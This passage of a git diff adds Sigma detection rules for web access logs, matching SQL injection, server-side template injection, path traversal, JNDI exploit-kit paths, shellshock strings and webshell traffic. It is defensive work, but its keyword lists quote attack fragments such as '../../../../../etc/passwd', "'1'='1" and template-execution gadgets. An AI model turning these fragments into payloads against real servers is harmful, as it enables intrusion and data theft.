2021/10/06 +tags: + - attack.initial_access + - attack.t1190 +logsource: + category: webserver +detection: + selection: + c-uri|contains: '~1' + c-uri|endswith: 'a.aspx' + cs-method: + - GET + - OPTIONS + #only succes + sc-status: + - 200 + - 301 + condition: selection +falsepositives: + - Unknown +level: medium diff --git a/bin/main/rules/others_web/web_java_payload_in_access_logs.yml b/bin/main/rules/others_web/web_java_payload_in_access_logs.yml new file mode 100644 index 000000000..1e2d4ed9d --- /dev/null +++ b/bin/main/rules/others_web/web_java_payload_in_access_logs.yml @@ -0,0 +1,31 @@ +title: Java Payload Strings +id: 583aa0a2-30b1-4d62-8bf3-ab73689efe6c +status: experimental +description: Detects possible Java payloads in web access logs +author: frack113 +date: 2022/06/04 +modified: 2022/06/14 +references: + - https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/ + - https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/ + - https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md + - https://twitter.com/httpvoid0x2f/status/1532924261035384832 +logsource: + category: webserver +detection: + keywords: + - '%24%7B%28%23a%3D%40' + - '${(#a=@' + - '%24%7B%40java' + - '${@java' + - 'u0022java' + - '%2F%24%7B%23' + - '/${#' + - 'new+java.' + condition: keywords +falsepositives: + - Legitimate apps +level: high +tags: + - cve.2022.26134 + - cve.2021.26084 diff --git a/bin/main/rules/others_web/web_jndi_exploit.yml b/bin/main/rules/others_web/web_jndi_exploit.yml new file mode 100644 index 000000000..34ccd1cbb --- /dev/null +++ b/bin/main/rules/others_web/web_jndi_exploit.yml @@ -0,0 +1,37 @@ +title: JNDIExploit Pattern +id: 412d55bc-7737-4d25-9542-5b396867ce55 +status: experimental +description: Detects exploitation attempt using the JDNIExploiit Kit +author: Florian Roth +date: 2021/12/12 +references: + - https://github.com/pimps/JNDI-Exploit-Kit + - https://githubmemory.com/repo/FunctFan/JNDIExploit +logsource: + category: webserver +detection: + keywords: + - '/Basic/Command/Base64/' + - '/Basic/ReverseShell/' + - '/Basic/TomcatMemshell' + - '/Basic/JettyMemshell' + - '/Basic/WeblogicMemshell' + - '/Basic/JBossMemshell' + - '/Basic/WebsphereMemshell' + - '/Basic/SpringMemshell' + - '/Deserialization/URLDNS/' + - '/Deserialization/CommonsCollections1/Dnslog/' + - '/Deserialization/CommonsCollections2/Command/Base64/' + - '/Deserialization/CommonsBeanutils1/ReverseShell/' + - '/Deserialization/Jre8u20/TomcatMemshell' + - '/TomcatBypass/Dnslog/' + - '/TomcatBypass/Command/' + - '/TomcatBypass/ReverseShell/' + - '/TomcatBypass/TomcatMemshell' + - '/TomcatBypass/SpringMemshell' + - '/GroovyBypass/Command/' + - '/WebsphereBypass/Upload/' + condition: keywords +falsepositives: + - Legitimate apps the use these paths +level: high diff --git a/bin/main/rules/others_web/web_multiple_susp_resp_codes_single_source.yml b/bin/main/rules/others_web/web_multiple_susp_resp_codes_single_source.yml new file mode 100644 index 000000000..40b342769 --- /dev/null +++ b/bin/main/rules/others_web/web_multiple_susp_resp_codes_single_source.yml @@ -0,0 +1,30 @@ +title: Multiple Suspicious Resp Codes Caused by Single Client +id: 6fdfc796-06b3-46e8-af08-58f3505318af +status: test +description: Detects possible exploitation activity or bugs in a web application +author: Thomas Patzke +date: 2017/02/19 +modified: 2021/11/27 +logsource: + category: webserver +detection: + selection: + sc-status: + - 400 + - 401 + - 403 + - 500 + timeframe: 10m + condition: selection +fields: + - client_ip + - vhost + - url + - response +falsepositives: + - Unstable application + - Application that misuses the response codes +level: medium +tags: + - attack.initial_access + - attack.t1190 diff --git a/bin/main/rules/others_web/web_nginx_core_dump.yml b/bin/main/rules/others_web/web_nginx_core_dump.yml new file mode 100644 index 000000000..58df5c969 --- /dev/null +++ b/bin/main/rules/others_web/web_nginx_core_dump.yml @@ -0,0 +1,21 @@ +title: Nginx Core Dump +id: 59ec40bb-322e-40ab-808d-84fa690d7e56 +description: Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts. +status: experimental +author: Florian Roth +date: 2021/05/31 +references: + - https://docs.nginx.com/nginx/admin-guide/monitoring/debugging/#enabling-core-dumps + - https://www.x41-dsec.de/lab/advisories/x41-2021-002-nginx-resolver-copy/ +logsource: + service: apache +detection: + keywords: + - 'exited on signal 6 (core dumped)' + condition: keywords +falsepositives: + - Serious issues with a configuration or plugin +level: high +tags: + - attack.impact + - attack.t1499.004 diff --git a/bin/main/rules/others_web/web_path_traversal_exploitation_attempt.yml b/bin/main/rules/others_web/web_path_traversal_exploitation_attempt.yml new file mode 100644 index 000000000..5eeeed755 --- /dev/null +++ b/bin/main/rules/others_web/web_path_traversal_exploitation_attempt.yml @@ -0,0 +1,24 @@ +title: Path Traversal Exploitation Attempts +id: 7745c2ea-24a5-4290-b680-04359cb84b35 +author: Subhash Popuri (@pbssubhash), Florian Roth (generalisation) +date: 2021/09/25 +status: experimental +description: Detects path traversal exploitation attempts +references: + - https://github.com/projectdiscovery/nuclei-templates +logsource: + category: webserver +detection: + selection: + c-uri|contains: + - '../../../../../etc/passwd' + - '../../../../windows/' + - '../../../../../lib/password' + condition: selection +falsepositives: + - Happens all the time on systems exposed to the Internet + - Internal vulnerability scanners +tags: + - attack.initial_access + - attack.t1190 +level: medium diff --git a/bin/main/rules/others_web/web_solarwinds_supernova_webshell.yml b/bin/main/rules/others_web/web_solarwinds_supernova_webshell.yml new file mode 100644 index 000000000..4e3434d56 --- /dev/null +++ b/bin/main/rules/others_web/web_solarwinds_supernova_webshell.yml @@ -0,0 +1,30 @@ +title: Solarwinds SUPERNOVA Webshell Access +id: a2cee20b-eacc-459f-861d-c02e5d12f1db +status: experimental +description: Detects access to SUPERNOVA webshell as described in Guidepoint report +author: Florian Roth +date: 2020/12/17 +modified: 2021/08/09 +references: + - https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/ + - https://www.anquanke.com/post/id/226029 +tags: + - attack.persistence + - attack.t1505.003 +logsource: + category: webserver +detection: + selection1: + c-uri|contains|all: + - 'logoimagehandler.ashx' + - 'clazz' + selection2: + c-uri|contains: 'logoimagehandler.ashx' + sc-status: 500 + condition: selection1 or selection2 +fields: + - client_ip + - response +falsepositives: + - Unknown +level: critical diff --git a/bin/main/rules/others_web/web_sonicwall_jarrewrite_exploit.yml b/bin/main/rules/others_web/web_sonicwall_jarrewrite_exploit.yml new file mode 100644 index 000000000..0b003911c --- /dev/null +++ b/bin/main/rules/others_web/web_sonicwall_jarrewrite_exploit.yml @@ -0,0 +1,27 @@ +title: SonicWall SSL/VPN Jarrewrite Exploit +id: 6f55f047-112b-4101-ad32-43913f52db46 +status: experimental +description: Detects exploitation attempts of the SonicWall Jarrewrite Exploit +author: Florian Roth +date: 2021/01/25 +tags: + - attack.t1190 + - attack.initial_access +references: + - https://darrenmartyn.ie/2021/01/24/visualdoor-sonicwall-ssl-vpn-exploit/ +logsource: + category: webserver +detection: + selection: + c-uri|contains: '/cgi-bin/jarrewrite.sh' + c-useragent|contains: + - ':;' + - '() {' + - '/bin/bash -c' + condition: selection +fields: + - c-ip + - c-dns +falsepositives: + - Unknown +level: high diff --git a/bin/main/rules/others_web/web_source_code_enumeration.yml b/bin/main/rules/others_web/web_source_code_enumeration.yml new file mode 100644 index 000000000..51e3015bd --- /dev/null +++ b/bin/main/rules/others_web/web_source_code_enumeration.yml @@ -0,0 +1,27 @@ +title: Source Code Enumeration Detection by Keyword +id: 953d460b-f810-420a-97a2-cfca4c98e602 +status: test +description: Detects source code enumeration that use GET requests by keyword searches in URL strings +author: James Ahearn +references: + - https://pentester.land/tutorials/2018/10/25/source-code-disclosure-via-exposed-git-folder.html + - https://medium.com/@logicbomb_1/bugbounty-how-i-was-able-to-download-the-source-code-of-indias-largest-telecom-service-52cf5c5640a1 +date: 2019/06/08 +modified: 2021/11/27 +logsource: + category: webserver +detection: + keywords: + - '*.git/*' + condition: keywords +fields: + - client_ip + - vhost + - url + - response +falsepositives: + - Unknown +level: medium +tags: + - attack.discovery + - attack.t1083 diff --git a/bin/main/rules/others_web/web_sql_injection_in_access_logs.yml b/bin/main/rules/others_web/web_sql_injection_in_access_logs.yml new file mode 100644 index 000000000..f7767e58f --- /dev/null +++ b/bin/main/rules/others_web/web_sql_injection_in_access_logs.yml @@ -0,0 +1,53 @@ +title: SQL Injection Strings +id: 5513deaf-f49a-46c2-a6c8-3f111b5cb453 +status: test +description: Detects SQL Injection attempts via GET requests in access logs +author: Saw Win Naung, Nasreddine Bencherchali +date: 2020/02/22 +modified: 2022/06/27 +references: + - https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/ + - https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/ + - https://brightsec.com/blog/sql-injection-payloads/ + - https://github.com/payloadbox/sql-injection-payload-list +logsource: + category: webserver +detection: + select_method: + cs-method: 'GET' + keywords: + - '=select' + - 'UNION SELECT' + - 'UNION%20SELECT' + - 'UNION ALL SELECT' + - 'UNION%20ALL%20SELECT' + - 'CONCAT(0x' + - 'order by ' + - 'order%20by%20' + - 'information_schema.tables' + - 'group_concat(' + - 'table_schema' + - 'select%28sleep%2810%29' + - '@@version' + - "'1'='1" + - '%271%27%3D%271' + - 'SELECTCHAR(' + - 'select * ' + - 'select%20*%20' + - 'or 1=1#' + - 'or%201=1#' + filter: + sc-status: 404 + filter_fps: + - '=select2' + condition: select_method and keywords and not 1 of filter* +fields: + - client_ip + - vhost + - url + - response +falsepositives: + - Java scripts and CSS Files + - User searches in search boxes of the respective website + - Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as "User Agent" strings and more response codes +level: high diff --git a/bin/main/rules/others_web/web_ssti_in_access_logs.yml b/bin/main/rules/others_web/web_ssti_in_access_logs.yml new file mode 100644 index 000000000..ad0a19854 --- /dev/null +++ b/bin/main/rules/others_web/web_ssti_in_access_logs.yml @@ -0,0 +1,32 @@ +title: Server Side Template Injection Strings +id: ada3bc4f-f0fd-42b9-ba91-e105e8af7342 +status: experimental +description: Detects SSTI attempts sent via GET requests in access logs +author: Nasreddine Bencherchali +date: 2022/06/14 +references: + - https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection + - https://github.com/payloadbox/ssti-payloads +logsource: + category: webserver +detection: + select_method: + cs-method: 'GET' + keywords: + - '={{' + - '=%7B%7B' + - '=${' + - '=$%7B' + - '=<%=' + - '=%3C%25=' + - '=@(' + - 'freemarker.template.utility.Execute' + - .getClass().forName('javax.script.ScriptEngineManager') + - 'T(org.apache.commons.io.IOUtils)' + filter: + sc-status: 404 + condition: select_method and keywords and not filter +falsepositives: + - User searches in search boxes of the respective website + - Internal vulnerability scanners can cause some serious FPs when used, if you experience a lot of FPs due to this think of adding more filters such as "User Agent" strings and more response codes +level: high diff --git a/bin/main/rules/others_web/web_susp_windows_path_uri.yml b/bin/main/rules/others_web/web_susp_windows_path_uri.yml new file mode 100644 index 000000000..122a29d5a --- /dev/null +++ b/bin/main/rules/others_web/web_susp_windows_path_uri.yml @@ -0,0 +1,27 @@ +title: Suspicious Windows Strings In URI +id: 9f6a34b4-2688-4eb7-a7f5-e39fef573d0e +status: experimental +description: Detects suspicious windows strins in URI which could indicate possible exfiltration or webshell communication +author: Nasreddine Bencherchali +date: 2022/06/06 +references: + - https://thedfirreport.com/2022/06/06/will-the-real-msiexec-please-stand-up-exploit-leads-to-data-exfiltration/ +logsource: + category: webserver +detection: + selection: + c-uri|contains: + - '=C:/Users' + - '=C:/Program%20Files' + - '=C:/Windows' + - '=C%3A%5CUsers' + - '=C%3A%5CProgram%20Files' + - '=C%3A%5CWindows' + condition: selection +falsepositives: + - Legitimate application and websites that use windows paths in their URL +level: high +tags: + - attack.persistence + - attack.exfiltration + - attack.t1505.003 diff --git a/bin/main/rules/others_web/web_unc2546_dewmode_php_webshell.yml b/bin/main/rules/others_web/web_unc2546_dewmode_php_webshell.yml new file mode 100644 index 000000000..47992070c --- /dev/null +++ b/bin/main/rules/others_web/web_unc2546_dewmode_php_webshell.yml @@ -0,0 +1,31 @@ +title: DEWMODE Webshell Access +id: fdf96c90-42d5-4406-8a9c-14a2c9a016b5 +status: experimental +description: Detects access to DEWMODE webshell as described in FIREEYE report +author: Florian Roth +date: 2021/02/22 +references: + - https://www.fireeye.com/blog/threat-research/2021/02/accellion-fta-exploited-for-data-theft-and-extortion.html +tags: + - attack.persistence + - attack.t1505.003 +logsource: + category: webserver +detection: + selection1: + c-uri|contains|all: + - '?dwn=' + - '&fn=' + - '.html?' + selection2: + c-uri|contains|all: + - '&dwn=' + - '?fn=' + - '.html?' + condition: 1 of selection* +fields: + - client_ip + - response +falsepositives: + - Unknown +level: high diff --git a/bin/main/rules/others_web/web_webshell_regeorg.yml b/bin/main/rules/others_web/web_webshell_regeorg.yml new file mode 100644 index 000000000..145f51802 --- /dev/null +++ b/bin/main/rules/others_web/web_webshell_regeorg.yml @@ -0,0 +1,36 @@ +title: Webshell ReGeorg Detection Via Web Logs +id: 2ea44a60-cfda-11ea-87d0-0242ac130003 +status: experimental +description: Certain strings in the uri_query field when combined with null referer and null user agent can indicate activity associated with the webshell ReGeorg. +author: Cian Heasley +date: 2020/08/04 +modified: 2021/11/23 +references: + - https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3 + - https://github.com/sensepost/reGeorg +logsource: + category: webserver +detection: + selection: + cs-uri-query|contains: + - 'cmd=read' + - 'connect&target' + - 'cmd=connect' + - 'cmd=disconnect' + - 'cmd=forward' + filter: + cs-referer: null + cs-User-Agent: null + cs-method: POST + condition: selection and filter +fields: + - cs-uri-query + - cs-referer + - cs-method + - cs-User-Agent +falsepositives: + - Web applications that use the same URL parameters as ReGeorg +level: high +tags: + - attack.persistence + - attack.t1505.003 diff --git a/bin/main/rules/others_web/web_win_webshells_in_access_logs.yml b/bin/main/rules/others_web/web_win_webshells_in_access_logs.yml new file mode 100644 index 000000000..c02536f52 --- /dev/null +++ b/bin/main/rules/others_web/web_win_webshells_in_access_logs.yml @@ -0,0 +1,41 @@ +title: Windows Webshell Strings +id: 7ff9db12-1b94-4a79-ba68-a2402c5d6729 +status: test +description: Detects Windows Webshells that use GET requests via access logs +author: Florian Roth, Nasreddine Bencherchali +date: 2017/02/19 +modified: 2022/06/14 +references: + - https://bad-jubies.github.io/RCE-NOW-WHAT/ +logsource: + category: webserver +detection: + select_method: + cs-method: 'GET' + keywords: + - =whoami + - =net%20user + - =cmd%20/c%20 + - =powershell%20 + - =tasklist%20 + - =wmic%20 + - =ssh%20 #available on windows + - =python%20 + - =ipconfig + - =wget%20 #available on windows + - =curl%20 #available on windows + - =certutil + - =copy%20%5C%5C + condition: select_method and keywords +fields: + - client_ip + - vhost + - url + - response +falsepositives: + - Web sites like wikis with articles on os commands and pages that include the os commands in the URLs + - User searches in search boxes of the respective website +level: high +tags: + - attack.persistence + - attack.t1505.003 diff --git a/bin/main/rules/others_web/web_xss_in_access_logs.yml b/bin/main/rules/others_web/web_xss_in_access_logs.yml new file mode 100644 index 000000000..08cf9522c --- /dev/null +++ b/bin/main/rules/others_web/web_xss_in_access_logs.yml @@ -0,0 +1,45 @@ +title: Cross Site Scripting Strings +id: 65354b83-a2ea-4ea6-8414-3ab38be0d409 +status: experimental +description: Detects XSS attempts injected via GET requests in access logs +author: Saw Win Naung, Nasreddine Bencherchali +date: 2021/08/15 +modified: 2022/06/14 +references: + - https://github.com/payloadbox/xss-payload-list + - https://portswigger.net/web-security/cross-site-scripting/contexts +logsource: + category: webserver +detection: + select_method: + cs-method: 'GET' + keywords: + - '=